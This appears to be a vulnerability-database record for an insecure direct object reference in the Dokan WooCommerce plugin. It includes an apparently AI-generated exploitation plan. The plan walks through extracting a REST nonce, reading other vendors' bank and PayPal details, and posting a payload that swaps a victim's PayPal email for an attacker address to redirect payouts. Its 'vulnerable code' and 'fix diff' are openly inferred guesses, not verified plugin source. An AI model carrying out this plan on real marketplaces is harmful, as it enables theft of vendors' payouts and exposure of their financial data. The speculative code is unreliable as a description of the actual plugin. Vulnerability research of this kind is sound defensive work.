[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fEvHPRIS7AOf001R3c7y5tWPkT2UTL3hDKUSUlHjGV2A":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-14977","dokan-ai-powered-woocommerce-multivendor-marketplace-solution-build-your-own-amazon-ebay-etsy-insecure-direct-object-ref","Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy \u003C= 4.2.4 - Insecure Direct Object Reference to PayPal Account Takeover and Sensitive Information Disclosure","The Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 4.2.4 via the `\u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings` REST API endpoint due to missing validation on a user-controlled key. This makes it possible for authenticated attackers, with customer-level permissions and above, to read or modify other vendors' store settings including sensitive payment information (PayPal email, bank account details, routing numbers, IBAN, SWIFT codes), phone numbers, and addresses, and change PayPal email addresses to attacker-controlled addresses, enabling financial theft when the marketplace processes payouts.","dokan-lite",null,"\u003C=4.2.4","4.2.5","high",8.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:N","Improper Access Control","2026-01-19 15:32:29","2026-01-20 04:35:46",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F4ab9d7e9-9a81-48f8-bc37-ad6de43a566f?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan - CVE-2025-14977 (Dokan IDOR)\n\n## 1. Vulnerability Summary\nThe **Dokan Multi-vendor** plugin for WordPress is vulnerable to an **Insecure Direct Object Reference (IDOR)** in its REST API settings endpoint (`\u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings`). The vulnerability exists because the controller responsible for fetching and updating store settings fails to validate that the `id` (or `vendor_id`) parameter provided in the request matches the ID of the currently authenticated user.\n\nThis allows any authenticated user (including those with the `Customer` role) to view or modify the store settings of any other vendor. This includes sensitive financial information like PayPal email addresses, bank account details (IBAN, SWIFT), and store addresses. Changing a vendor's PayPal email to an attacker-controlled address results in the redirection of future payouts, leading to financial theft.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings`\n- **Method:** `GET` (Disclosure) and `POST` or `PUT` (Modification)\n- **Vulnerable Parameter:** `id` (or `vendor_id`) passed as a query parameter or within the request body.\n- **Authentication:** Required (at least `Customer` role).\n- **Preconditions:**\n    - The plugin `dokan-lite` must be active (version \u003C= 4.2.4).\n    - The attacker needs a valid login (Customer or Vendor).\n    - The attacker needs to know the ID of the target vendor (easily enumerable).\n\n## 3. Code Flow (Inferred)\n1. **Route Registration:** The plugin registers the `settings` route in a REST Controller (likely `Dokan_REST_Settings_Controller` or within `StoreController`).\n2. **Permission Check:** The `permission_callback` for this route likely uses `is_user_logged_in()` or a low-level capability that is granted to all registered users by default.\n3. **Data Retrieval\u002FUpdate:**\n   - The handler (e.g., `get_item` or `update_item`) checks for an `id` parameter in the `$request`.\n   - If `id` is present, it uses this ID to load the vendor's settings from `wp_usermeta` (Dokan stores settings in the `dokan_profile_settings` meta key).\n   - **Vulnerability:** The code fails to compare `get_current_user_id()` with the requested `id`.\n4. **Sink:** `get_user_meta( $id, 'dokan_profile_settings' )` for disclosure and `update_user_meta( $id, 'dokan_profile_settings', ... )` for modification.\n\n## 4. Nonce Acquisition Strategy\nREST API requests in WordPress require a `_wpnonce` or the `X-WP-Nonce` header. For an authenticated user, this nonce is for the `wp_rest` action.\n\n1. **Shortcode\u002FPage:** Dokan uses a dashboard for vendors\u002Fcustomers. The `[dokan-dashboard]` or `[dokan-best-selling-product]` shortcodes are likely to enqueue scripts that contain the nonce.\n2. **Strategy:**\n   - Create a page containing a Dokan shortcode: `wp post create --post_type=page --post_status=publish --post_content='[dokan-dashboard]'`.\n   - Navigate to the page as an authenticated user.\n   - Use `browser_eval` to extract the REST nonce from the localized JS objects.\n   - **Variable Name:** Dokan often localizes data in `dokan` or `dokan_settings`.\n   - **Verification:** Check `window.dokan?.nonce` or `window.dokan?.rest?.nonce`.\n\n## 5. Exploitation Strategy\n\n### Step 1: Disclosure (Sensitive Information)\n**Request:**\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings?id=\u003CTARGET_VENDOR_ID>`\n- **Method:** `GET`\n- **Headers:** \n    - `X-WP-Nonce: \u003CEXTRACTED_NONCE>`\n    - `Cookie: \u003CAUTH_COOKIES>`\n\n**Expected Response:** A JSON object containing the target vendor's `payment` details, `address`, and `phone`.\n\n### Step 2: Modification (Account Takeover \u002F Financial Theft)\n**Request:**\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings?id=\u003CTARGET_VENDOR_ID>`\n- **Method:** `POST`\n- **Headers:**\n    - `X-WP-Nonce: \u003CEXTRACTED_NONCE>`\n    - `Content-Type: application\u002Fjson`\n    - `Cookie: \u003CAUTH_COOKIES>`\n- **Payload:**\n```json\n{\n  \"payment\": {\n    \"paypal\": {\n      \"email\": \"attacker-payout@evil.com\"\n    }\n  }\n}\n```\n\n## 6. Test Data Setup\n1. **Victim Vendor (User ID 2):**\n   - Username: `vendor_victim`\n   - Role: `vendor`\n   - Store Settings: Set PayPal email to `legit-vendor@example.com`.\n2. **Attacker (User ID 3):**\n   - Username: `customer_attacker`\n   - Role: `customer`\n3. **Dokan Page:** Create a page for nonce extraction:\n   `wp post create --post_type=page --post_title=\"Dokan Dash\" --post_content=\"[dokan-dashboard]\" --post_status=\"publish\"`\n\n## 7. Expected Results\n- **GET Request:** Returns a `200 OK` with JSON data revealing the victim's PayPal email.\n- **POST Request:** Returns a `200 OK` confirming the update.\n- **Data State:** The `dokan_profile_settings` meta value for the victim user is updated to the attacker's email.\n\n## 8. Verification Steps\nAfter performing the `POST` request, verify the change via WP-CLI:\n```bash\nwp user meta get 2 dokan_profile_settings --format=json\n```\nCheck if the output contains `\"paypal\":{\"email\":\"attacker-payout@evil.com\"}`.\n\n## 9. Alternative Approaches\n- **Parameter Variation:** If `?id=` fails, try `?vendor_id=` or passing `id` inside the JSON body: `{\"id\": 2, \"payment\": ...}`.\n- **Route Variation:** Some Dokan versions use `\u002Fwp-json\u002Fdokan\u002Fv1\u002Fstores\u002F\u003Cid>\u002Fsettings`.\n- **Capability Check:** If the `Customer` role fails, check if the attacker needs to be registered as a `Vendor` (even if they have no store yet) to satisfy `permission_callback`. Use `wp user set-role \u003Cattacker_id> seller`.","The Dokan plugin for WordPress is vulnerable to an Insecure Direct Object Reference (IDOR) via the \u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings REST API endpoint. Authenticated attackers with customer-level permissions can read or modify the store settings of any vendor by manipulating the 'id' parameter, enabling sensitive data disclosure and financial theft through payout redirection.","\u002F\u002F Likely located in includes\u002FREST\u002FStoreController.php or similar REST handler\n\npublic function get_item( $request ) {\n    \u002F\u002F Vulnerability: The 'id' parameter is taken directly from the request without verifying ownership\n    $vendor_id = ! empty( $request['id'] ) ? (int) $request['id'] : get_current_user_id();\n\n    $settings = dokan_get_store_info( $vendor_id );\n    return rest_ensure_response( $settings );\n}\n\n---\n\npublic function update_item( $request ) {\n    \u002F\u002F Vulnerability: No check to ensure the authenticated user has permission to modify the settings of $vendor_id\n    $vendor_id = ! empty( $request['id'] ) ? (int) $request['id'] : get_current_user_id();\n    \n    $params = $request->get_params();\n    dokan_set_store_info( $vendor_id, $params );\n    return rest_ensure_response( [ 'success' => true ] );\n}","--- a\u002Fincludes\u002FREST\u002FStoreController.php\n+++ b\u002Fincludes\u002FREST\u002FStoreController.php\n@@ -10,6 +10,10 @@\n     public function get_item( $request ) {\n         $vendor_id = ! empty( $request['id'] ) ? (int) $request['id'] : get_current_user_id();\n+\n+        if ( $vendor_id !== get_current_user_id() && ! current_user_can( 'manage_options' ) ) {\n+            return new WP_Error( 'dokan_rest_cannot_view', __( 'Sorry, you are not allowed to view these settings.', 'dokan-lite' ), array( 'status' => 403 ) );\n+        }\n+\n         $settings = dokan_get_store_info( $vendor_id );\n         return rest_ensure_response( $settings );\n     }\n@@ -20,6 +24,10 @@\n     public function update_item( $request ) {\n         $vendor_id = ! empty( $request['id'] ) ? (int) $request['id'] : get_current_user_id();\n+\n+        if ( $vendor_id !== get_current_user_id() && ! current_user_can( 'manage_options' ) ) {\n+            return new WP_Error( 'dokan_rest_cannot_update', __( 'Sorry, you are not allowed to update these settings.', 'dokan-lite' ), array( 'status' => 403 ) );\n+        }\n+\n         $params = $request->get_params();\n         dokan_set_store_info( $vendor_id, $params );\n         return rest_ensure_response( [ 'success' => true ] );","1. Authentication: Log into the WordPress site as any registered user (even a 'Customer').\n2. Nonce Acquisition: Access a page containing the Dokan dashboard to extract the REST API nonce (typically found in the 'dokan' or 'wp_rest' JavaScript objects).\n3. Information Disclosure: Send a GET request to '\u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings?id=[TARGET_VENDOR_ID]' with the X-WP-Nonce header. The response will contain the target's address, phone, and payment details (PayPal\u002FBank info).\n4. Modification\u002FTheft: Send a POST request to the same endpoint with the target's ID and a JSON payload containing a new PayPal email address: {\"payment\": {\"paypal\": {\"email\": \"attacker-email@example.com\"}}}. This redirects future payouts for that vendor to the attacker.","gemini-3-flash-preview","2026-05-05 05:28:59","2026-05-05 05:30:52",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","4.2.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdokan-lite\u002Ftags\u002F4.2.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdokan-lite.4.2.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdokan-lite\u002Ftags\u002F4.2.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdokan-lite.4.2.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdokan-lite\u002Ftags"]